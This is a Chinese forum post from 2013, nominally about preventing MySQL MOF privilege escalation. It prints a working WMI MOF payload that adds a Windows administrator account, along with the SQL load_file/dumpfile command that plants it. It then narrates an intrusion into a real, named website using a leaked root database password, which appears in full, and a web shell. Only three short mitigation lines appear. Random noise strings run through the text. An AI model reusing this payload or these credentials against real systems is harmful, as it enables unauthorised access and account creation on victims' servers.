Mysql mof扩展漏洞防范方法
5 a6 K: P$ Z5 {7 A. R% V% q
7 t4 h( z5 Z, J- {* ?7 L7 t$ f) y网上公开的一些利用代码:
. m4 f9 P3 F4 K; D, |( z
* P; v5 ?6 e4 Z- F# ?5 G" n: O#pragma namespace(“\\\\.\\root\\subscription”)
/ ~2 F$ C8 s5 H e y
* e: @0 Q; K: h* F8 S, Y: i, g einstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
( q n$ n I# z" k( ?1 E8 V V6 b" b, s% q
1 b- ~% L* ]0 T9 M' c
% e% h" e& p: E* }( y* _1 a
; ^/ R8 U# \& _+ N( u( P/ N0 x3 s% l. c$ d! s/ i8 a
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
/ u' Y& C3 j+ R" x1 y' Q从上面代码来看得出解决办法:
, j6 j2 c; {6 x7 `; v. l+ T+ p
0 o6 D4 n- ^& y. y, ]" r; m1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数; Z0 a. T- R& F/ v8 H* ]% E
) j, A7 J9 f) x% f" A2、禁止使用”WScript.Shel”组件
* O# Z+ C' b2 {3 o! H+ z4 G' z0 C9 I4 v& _. J/ A
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER8 b0 H! n) J% H8 O# z
) P1 T* B$ W u2 n! \: e( y当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下4 \* u* M# ~; e0 g( E7 Y
# i/ Q" X2 c i- s8 `- J
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权, P3 u$ n3 u$ c" M4 _* Y
, @- |( ~( a7 S* p" _但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
! c& ?4 [- T! _
$ X7 Y' \; P0 b0 _0 t# I9 A8 l看懂了后就开始练手吧
7 k( a! ?9 W/ P# P3 d
, b2 |/ P b4 K1 F% @ P0 ? ~http://www.webbmw.com/config/config_ucenter.php 一句话 a' L7 l0 d# h& p9 m
( V+ ]6 L' [9 g, k$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。5 U* w9 j. Z# T3 d4 [
3 J3 O! ?. c- F) b8 z
于是直接用菜刀开搞
/ ?3 u d! n# b% W* ]6 G, ^8 m2 j0 c
上马先3 O+ \, K* G) l" {0 C" |
1 i( Q* u$ a2 x$ j. a
既然有了那些账号 之类的 于是我们就执行吧…….
( ^$ U0 v1 z) K, {4 x4 R4 N; V$ N B, P! C
小小的说下 d. F% v+ z& |( C4 j
0 w; _0 v7 B6 T* K$ l. z- _
在这里第1次执行未成功 原因未知- f' P6 G: ]% _' r6 Z& E e; Q
+ T- X5 _( J7 f# h我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
' n& t% j% S C$ P, m6 w# u, _* ]0 @' V$ ?
#pragma namespace(“\\\\.\\root\\subscription”)3 o' o8 O2 |$ Y
$ _; u+ ?( P3 C' y. }$ x; @instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
5 V; |1 r, }, T w) ~! b9 ^$ x5 v" d& M* e' i7 Y/ ?" l- }
我是将文件放到C:\WINDOWS\temp\1.mof
6 j1 {( T% H. l& _0 R9 m5 k$ @" l1 ~6 t( z- I/ h' k; K& [# Q
所以我们就改下执行的代码' G! j! t( \$ A% u1 g
% M0 W$ u2 h9 h- |* c
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;9 m% r: h* B& g6 z y3 O* C
, }' x; `3 `9 X( z& r' W# ~. f
+ _1 [' Q+ b4 X: t" h
2 t: v/ D0 q3 ^5 G
但是 你会发现账号还是没有躺在那里。。
( Q: S8 b3 g8 G% c0 q9 U
6 c" M( W9 R% {于是我就感觉蛋疼
0 C" }( m2 ]5 p5 Z1 Y# O
! y: M; ?* v. ~( @. f就去一个一个去执行 但是执行到第2个 mysql时就成功了………6 y3 Z q5 v8 j" U) K
$ n2 N" X) a6 x- L7 a2 P1 w% W, i. d7 X& f! s, |6 t( u
$ @ Q1 d& a9 g: J# M6 A- m ~0 @但是其他库均不成功…
" e- b+ G7 |5 f& ^) t
) T2 ` P n/ U# \1 B我就很费解呀 到底为什么不成功求大牛解答…
- }4 C& @ r" Z& z% [ V B- u( n3 P( i. R: e5 }! J: J
4 Z0 V4 _3 D1 ~
' y* g9 E7 s6 m
|
发表于 2013-1-4 19:49:49
收藏
支持
反对